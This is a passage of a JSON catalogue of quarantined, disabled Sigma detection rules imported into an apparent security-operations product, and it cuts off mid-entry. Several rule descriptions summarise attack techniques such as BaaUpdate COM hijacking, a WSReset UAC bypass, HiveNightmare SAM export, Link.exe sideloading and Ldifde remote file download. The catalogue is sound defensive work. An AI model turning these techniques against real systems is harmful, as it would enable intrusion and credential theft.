null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-mssql-login-attempt-via-windows-authentication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6e78f90f-0043-4a01-ac41-f97681613a66", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_mssql_login_winauth.yml" } }, { "id": "sigmahq-sigma-6e8fe0a8-ba0b-4a93-8f9e-82657e7a5984", "type": "detection", "name": "BaaUpdate.exe Suspicious DLL Load", "description": "Detects BitLocker Access Agent Update Utility (baaupdate.exe) loading DLLs from suspicious locations that are publicly writable which could indicate an attempt to lateral movement via BitLocker DCOM & COM Hijacking.\nThis technique abuses COM Classes configured as INTERACTIVE USER to spawn processes in the context of the logged-on user's session. Specifically, it targets the BDEUILauncher Class (CLSID ab93b6f1-be76-4185-a488-a9001b105b94)\nwhich can launch BaaUpdate.exe, which is vulnerable to COM Hijacking when started with input parameters. This allows attackers to execute code in the user's context without needing to steal credentials or use additional techniques to compromise the account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1021.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/baaupdate-exe-suspicious-dll-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6e8fe0a8-ba0b-4a93-8f9e-82657e7a5984", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_susp_baaupdate_dll_load.yml" } }, { "id": "sigmahq-sigma-6e90ae7a-7cd3-473f-a035-4ebb72d961da", "type": "detection", "name": "PCRE.NET Package Temp Files", "description": "Detects processes creating temp files related to PCRE.NET package", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pcre-net-package-temp-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_pcre_net_temp_file.yml" } }, { "id": "sigmahq-sigma-6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", "type": "detection", "name": "Uncommon Link.EXE Parent Process", "description": "Detects an uncommon parent process of \"LINK.EXE\".\nLink.EXE in Microsoft incremental linker. Its a utility usually bundled with Visual Studio installation.\nMultiple utilities often found in the same folder (editbin.exe, dumpbin.exe, lib.exe, etc) have a hardcode call to the \"LINK.EXE\" binary without checking its validity.\nThis would allow an attacker to sideload any binary with the name \"link.exe\" if one of the aforementioned tools get executed from a different location.\nBy filtering the known locations of such utilities we can spot uncommon parent process of LINK.EXE that might be suspicious or malicious.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-link-exe-parent-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_link_uncommon_parent_process.yml" } }, { "id": "sigmahq-sigma-6ea3bf32-9680-422d-9f50-e90716b12a66", "type": "detection", "name": "UAC Bypass Via Wsreset", "description": "Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-via-wsreset.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6ea3bf32-9680-422d-9f50-e90716b12a66", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml" } }, { "id": "sigmahq-sigma-6ea858a8-ba71-4a12-b2cc-5d83312404c7", "type": "detection", "name": "HackTool - Typical HiveNightmare SAM File Export", "description": "Detects files written by the different tools that exploit HiveNightmare", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-typical-hivenightmare-sam-file-export.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_hktl_hivenightmare_file_exports.yml" } }, { "id": "sigmahq-sigma-6ec820f2-e963-4801-9127-d8b2dce4d31b", "type": "detection", "name": "APT User Agent", "description": "Detects suspicious user agent strings used in APT malware in proxy logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/apt-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6ec820f2-e963-4801-9127-d8b2dce4d31b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_ua_apt.yml" } }, { "id": "sigmahq-sigma-6ec86d9e-912e-4726-91a2-209359b999b9", "type": "detection", "name": "Amsi.DLL Loaded Via LOLBIN Process", "description": "Detects loading of \"Amsi.dll\" by a living of the land process. This could be an indication of a \"PowerShell without PowerShell\" attack", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/amsi-dll-loaded-via-lolbin-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6ec86d9e-912e-4726-91a2-209359b999b9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_dll_amsi_suspicious_process.yml" } }, { "id": "sigmahq-sigma-6eea1bf6-f8d2-488a-a742-e6ef6c1b67db", "type": "detection", "name": "OMIGOD SCX RunAsProvider ExecuteScript", "description": "Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell.\nScript being executed gets created as a temp file in /tmp folder with a scx* prefix.\nThen it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/.\nThe file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1068", "T1190", "T1203" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/omigod-scx-runasprovider-executescript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6eea1bf6-f8d2-488a-a742-e6ef6c1b67db", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml" } }, { "id": "sigmahq-sigma-6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", "type": "detection", "name": "Potentially Suspicious Child Process Of Regsvr32", "description": "Detects potentially suspicious child processes of \"regsvr32.exe\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-child-process-of-regsvr32.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml" } }, { "id": "sigmahq-sigma-6f156c48-3894-4952-baf0-16193e9067d2", "type": "detection", "name": "CodeIntegrity - Blocked Image Load With Revoked Certificate", "description": "Detects blocked image load events with revoked certificates by code integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/codeintegrity-blocked-image-load-with-revoked-certificate.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6f156c48-3894-4952-baf0-16193e9067d2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/code_integrity/win_codeintegrity_revoked_image_blocked.yml" } }, { "id": "sigmahq-sigma-6f1a11aa-4b8a-4b7f-9e13-4d3e4ff0e0d4", "type": "detection", "name": "WSL Kali-Linux Usage", "description": "Detects the use of Kali Linux through Windows Subsystem for Linux", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wsl-kali-linux-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6f1a11aa-4b8a-4b7f-9e13-4d3e4ff0e0d4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wsl_kali_linux_usage.yml" } }, { "id": "sigmahq-sigma-6f3e2987-db24-4c78-a860-b4f4095a7095", "type": "detection", "name": "Files Added To An Archive Using Rar.EXE", "description": "Detects usage of \"rar\" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/files-added-to-an-archive-using-rar-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6f3e2987-db24-4c78-a860-b4f4095a7095", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rar_compress_data.yml" } }, { "id": "sigmahq-sigma-6f4191bb-912b-48a8-9ce7-682769541e6d", "type": "detection", "name": "Suspicious Msiexec Execute Arbitrary DLL", "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-msiexec-execute-arbitrary-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6f4191bb-912b-48a8-9ce7-682769541e6d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msiexec_execute_dll.yml" } }, { "id": "sigmahq-sigma-6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", "type": "detection", "name": "Import LDAP Data Interchange Format File Via Ldifde.EXE", "description": "Detects the execution of \"Ldifde.exe\" with the import flag \"-i\". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/import-ldap-data-interchange-format-file-via-ldifde-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml" } }, { "id": "sigmahq-sigma-6f583da0-3a90-4566-a4ed-83c09fe18bbf", "type": "detection", "name": "Account Created And Deleted Within A Close Time Frame", "description": "Detects when an account was created and deleted in a short period of time.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/account-created-and-deleted-within-a-close-time-frame.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6f583da0-3a90-4566-a4ed-83c09fe18bbf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_ad_account_created_deleted.yml" } }, { "id": "sigmahq-sigma-6f7e1c10-2dc9-4312-adb6-9574ff09a5c8", "type": "detection", "name": "Cisco Duo Successful MFA Authentication Via Bypass Code", "description": "Detects when a successful MFA authentication occurs due to the use of a bypass code.\nA bypass code is a temporary passcode created by an administrator for a specific user to access a Duo-protected application. These are generally used as \"backup codes,\" so that enrolled users who are having problems with their mobile devices (e.g., mobile service is disrupted, the device is lost or stolen, etc.) or who temporarily can't use their enrolled devices (on a plane without mobile data services) can still access their Duo-protected systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cisco-duo-successful-mfa-authentication-via-bypass-code.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6f7e1c10-2dc9-4312-adb6-9574ff09a5c8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/cisco_duo/cisco_duo_mfa_bypass_via_bypass_code.yml" } }, { "id": "sigmahq-sigma-6f8b3439-a203-45dc-a88b-abf57ea15ccf", "type": "detection", "name": "HackTool - CrackMapExec PowerShell Obfuscation", "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1027.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-crackmapexec-powershell-obfuscation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" } }, { "id": "sigmahq-sigma-6fb63b40-e02a-403e-9ffd-3bcc1d749442", "type": "detection", "name": "Metasploit Or Impacket Service Installation Via SMB PsExec", "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1570", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/metasploit-or-impacket-service-installation-via-smb-psexec.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_metasploit_or_impacket_smb_psexec_service_install.yml" } }, { "id": "sigmahq-sigma-6fb77778-040f-4015-9440-572aa9b6b580", "type": "detection", "name": "Ingress/Egress Security Group Modification", "description": "Detects when an account makes changes to the ingress or egress rules of a security group.\nThis can indicate that an attacker is attempting to open up new attack vectors in the account, that they are trying to exfiltrate data over the network, or that they are trying to allow machines in that VPC/Subnet to contact a C&C server.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ingress-egress-security-group-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6fb77778-040f-4015-9440-572aa9b6b580", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_security_group_change_ingress_egress.yml" } }, { "id": "sigmahq-sigma-6fe4aa1e-0531-4510-8be2-782154b73b48", "type": "detection", "name": "File Recovery From Backup Via Wbadmin.EXE", "description": "Detects the recovery of files from backups via \"wbadmin.exe\".\nAttackers can restore sensitive files such as NTDS.DIT or Registry Hives from backups in order to potentially extract credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-recovery-from-backup-via-wbadmin-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6fe4aa1e-0531-4510-8be2-782154b73b48", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wbadmin_restore_file.yml" } }, { "id": "sigmahq-sigma-6ff08e55-ea53-4f27-94a1-eff92e6d9d5c", "type": "detection", "name": "System Information Discovery Via Sysctl - MacOS", "description": "Detects the execution of \"sysctl\" with specific arguments that have been used by threat actors and malware. It provides system hardware information.\nThis process is primarily used to detect and avoid virtualization and analysis environments.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1497.001", "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-information-discovery-via-sysctl-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6ff08e55-ea53-4f27-94a1-eff92e6d9d5c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_sysctl_discovery.yml" } }, { "id": "sigmahq-sigma-7002aa10-b8d4-47ae-b5ba-51ab07e228b9", "type": "detection", "name": "Potential Mpclient.DLL Sideloading Via Defender Binaries", "description": "Detects potential sideloading of \"mpclient.dll\" by Windows Defender processes (\"MpCmdRun\" and \"NisSrv\") from their non-default directory.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-mpclient-dll-sideloading-via-defender-binaries.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mpcmdrun_dll_sideload_defender.yml" } }, { "id": "sigmahq-sigma-700fb7e8-2981-401c-8430-be58e189e741", "type": "detection", "name": "Suspicious Package Installed - Linux", "description": "Detects installation of suspicious packages using system installation utilities", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-package-installed-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "700fb7e8-2981-401c-8430-be58e189e741", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_install_suspicious_packages.yml" } }, { "id": "sigmahq-sigma-7021255e-5db3-4946-a8b9-0ba7a4644a69", "type": "detection", "name": "Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG", "description": "Detects potential abuse of the provisioning registry key for indirect command execution through \"Provlaunch.exe\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-provisioning-registry-key-abuse-for-binary-proxy-execution-reg.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7021255e-5db3-4946-a8b9-0ba7a4644a69", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_provisioning_command_abuse.yml" } }, { "id": "sigmahq-sigma-7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", "type": "detection", "name": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module", "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-compress-obfuscation-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_compress.yml" } }, { "id": "sigmahq-sigma-7047d730-036f-4f40-b9d8-1c63e36d5e62", "type": "detection", "name": "Potential Binary Or Script Dropper Via PowerShell", "description": "Detects PowerShell creating a binary executable or a script file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-binary-or-script-dropper-via-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7047d730-036f-4f40-b9d8-1c63e36d5e62", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_powershell_drop_binary_or_script.yml" } }, { "id": "sigmahq-sigma-705072a5-bb6f-4ced-95b6-ecfa6602090b", "type": "detection", "name": "WebDav Put Request", "description": "A General detection for WebDav user-agent being used to PUT files on a WebDav network share. This could be an indicator of exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1048.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/webdav-put-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "705072a5-bb6f-4ced-95b6-ecfa6602090b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_http_webdav_put_request.yml" } }, { "id": "sigmahq-sigma-7050bba1-1aed-454e-8f73-3f46f09ce56a", "type": "detection", "name": "Cloudflared Tunnel Connections Cleanup", "description": "Detects execution of the \"cloudflared\" tool with the tunnel \"cleanup\" flag in order to cleanup tunnel connections.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1102", "T1090", "T1572" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cloudflared-tunnel-connections-cleanup.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7050bba1-1aed-454e-8f73-3f46f09ce56a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cloudflared_tunnel_cleanup.yml" } }, { "id": "sigmahq-sigma-707e097c-e20f-4f67-8807-1f72ff4500d6", "type": "detection", "name": "Potential Persistence Via App Paths Default Property", "description": "Detects changes to the \"Default\" property for keys located in the 